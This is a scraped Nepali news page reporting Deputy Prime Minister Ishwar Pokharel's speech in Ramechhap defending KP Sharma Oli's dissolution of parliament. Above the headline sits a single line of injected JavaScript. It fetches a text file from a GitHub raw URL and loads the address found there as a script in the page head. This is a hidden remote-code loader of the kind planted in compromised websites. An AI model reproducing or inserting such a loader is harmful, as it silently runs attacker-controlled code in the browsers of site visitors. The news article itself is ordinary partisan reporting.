;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओलीले बाध्यताले संसद् बिघटन गरेका हुन्- ईश्वर पोखरेल – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • ओलीले बाध्यताले संसद् बिघटन गरेका हुन्- ईश्वर पोखरेल
देश/प्रदेश

ओलीले बाध्यताले संसद् बिघटन गरेका हुन्- ईश्वर पोखरेल

पुष २२,
रामेछाप । उप-प्रधानमन्त्री ईश्वर पोखरेलले प्रधानमन्त्री केपी शर्मा ओलीले बाध्यभएर संसद् बिघटन गरेको बताए । ओली नेपालको एक मात्रै राष्ट्रबादी, देशभक्ति, विकास् प्रेमी प्रधानमन्त्री भएको उनको भनाई छ ।

नेपाल कम्युनिष्ट पार्टी (नेकपा) का सचिवालय सदस्यसमेत रहेका पोखरेलले बुधबार (आज) नेकपा ओली समूह रामेछापले आयोजना गरेको पार्टी प्रशिक्षण तथा भेलालाई सम्बोधन गर्दै भने-ओलीले देश बर्बदिको हातमा पर्ने सम्भावनादेख्नुभयो, त्यसैले बाध्यभएर नचाहाँदा नचाहदै पनि बर्दादिलाई सम्पीनुभन्दा नयाँजनादेशमा जानु उपयुक्त हुनेभनेर संविधानले दिएको विशेअधिकार प्रयोग गरेर संसद् बिघटन गर्नुभयो ।

उनले थपे-ओली भारतसंग आँखामा आँखा झुधाएर बोल्ने हालसम्मकै एकमात्र प्रधानमन्त्री, समृद्ध नेपाल सुखी नेपाली बनेको हेर्नचाहाने एक मात्रै प्रधानमन्त्री, जनताको भावना बुझ्ने प्रधानमन्त्री, नेपालको भु-भाग एक बनाउने प्रधानमन्त्री अनि यो सबैदेखेर प्रशांसा गर्न पर्नू पर्ने बेलामा उल्टै छिमेकीसंग सम्बन्ध बिगार्यो भनेर जनतामा भ्रम छर्ने काम गर्ने सरकारलाई उल्लटो खेद्ने काम भयो त्यसैले ओलीले संसद् बिघटन गर्नुभयो पोखरेलले भने ।

करिब ३५ मिनेट बोल्नुभएका उप-प्रधानमन्त्री पोखरेलले अधिकांश समय प्रचण्ड र माधव कुमार नेपालले गर्दा पार्टी धुर्बीकरण भएको जिकिर गरे ।

कार्यक्रममा युवा संघका केन्द्रीय उपाध्यक्ष माधव ढुंङ्गेल, बागमती प्रदेशका आर्थिक मामिला तथा योजनामन्त्री एवं ओली समूहका केन्द्रीय सदस्य कैलाश ढुंङ्गेलले जिल्लामा विगतमा आफूनिकट नेताहरुले बाटो मोडेलकाले आफूहरुसंगै आउन आग्रह गर्नुभएको थियो । उनले आगामी निर्वाचनमा आफ्नो समूहले दुईतीहाई ल्याउने दाबी समेत गरे ।

फेसबुक प्रतिक्रियाहरु